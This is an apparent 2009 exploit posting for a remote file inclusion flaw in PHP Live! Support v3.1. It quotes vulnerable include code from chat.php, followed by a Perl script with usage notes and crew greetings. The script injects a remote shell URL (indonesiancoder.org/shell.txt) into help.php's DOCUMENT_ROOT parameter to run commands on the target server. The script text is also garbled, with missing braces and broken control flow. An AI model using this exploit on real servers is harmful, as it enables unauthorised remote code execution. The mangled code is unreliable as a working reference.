##### # [»] Author : Don Tukulesto (root@indonesiancoder.com) # [»] Date : November 23, 2009 # [»] Homepage : http://www.indonesiancoder.com # [»] Method : Remote File Inclusion # [»] Location : INDONESIA # [»] Vendor : http://www.phplivesupport.com/ # [»] Describe : PHP Live! Support v3.1 (c) by OSI Codes Inc. # Chat with your website visitors with PHP Live! # # * Provide Live Support on your Website # * Increase your Sales # * Increase Customer Satisfaction # * Decrease your phone/operational costs # [»] Usage : # perl tux.pl cmd # perl tux.pl http://www.indonesiancoder.org/shell.txt cmd # Weapon example: ##### # [-] Bugs in [+] index.php

[+] chat.php
[Configuration Error: config files not found! -$sid] Exiting..." ;
        exit ;
    include_once("./web/conf-init.php") ;
    $DOCUMENT_ROOT = realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) ) ;
    include_once("$DOCUMENT_ROOT/web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php") ;
    include_once("$DOCUMENT_ROOT/system.php") ;
    include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;
    include_once("$DOCUMENT_ROOT/API/sql.php") ;
    include_once("$DOCUMENT_ROOT/API/Chat/update.php") ;

    // set frame row properties depending if admin or regular request
    $frame_row_properties = "*,100%" ;
    if ( $session_chat[$sid]['isadmin'] && $session_chat[$sid]['deptid'] )
        $frame_row_properties = "*,100%" ;
    // let's start the poll time
    $_SESSION['session_chat'][$sid]['admin_poll_time'] = time() ;
    $window_title = preg_replace( "/<(.*)>/", "", $session_chat[$sid]['visitor_name'] ) .": Support Request" ;
[+] help.php

[-] PoC [-] eXpL0!t c0des

use HTTP::Request;
use LWP::UserAgent;
$RoNz = $ARGV[0];
$Pathloader = $ARGV[1];
$Contrex = $ARGV[2];
if($RoNz!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()}
sub head()
 print "[o]============================================================================[o]\r\n";
 print " |	       PHP Live! Support v3.1 Multiple Remote File Include	   	|\r\n";
 print "[o]============================================================================[o]\r\n";
      print "[w00t] \$";
$arianom = LWP::UserAgent->new() or die;
$tiw0L = HTTP::Request->new(GET =>$RoNz.'help.php?DOCUMENT_ROOT='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n";
$abah_benu = $arianom->request($tiw0L);
$tukulesto = $abah_benu->content;
$tukulesto =~ tr/[\n]/[Í]/;
if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";}
elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /)
      {print "\nCann't Connect to cmd Host or Invalid Command\n";exit}
elsif ($tukulesto =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
if($tukulesto =~ /(.*)/)
      $finreturn = $1;
      $finreturn=~ tr/[Í]/[\n]/;
      print "\r\n$finreturn\n\r";
else {print "[w00t] \$";}}}last;
sub usage()
 print " | Usage:  perl tux.pl   				|\r\n";
 print " |  - Full path to execute ex:			|\r\n";
 print " |  - Path to Shell e.g http://www.indonesiancoder.org/shell.txt	|\r\n";
 print " |  - Command variable used in php shell					|\r\n";
 print "[o]============================================================================[o]\r\n";
 print " | 	IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org    |\r\n";
 print " |   kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S      |\r\n";
 print " | M364TR0N, TUCKER, Ian Petrucii, kecemplungkalen, NoGe, bh4nd55, MainHack.Net |\r\n";
 print " |  Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint   |\r\n";
 print " |    Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n";
 print "[o]============================================================================[o]\r\n";
 print " |	http://www.IndonesianCoder.org	   |	http://www.AntiSecRadio.fm 	|\r\n";
 print "[o]============================================================================[o]\r\n";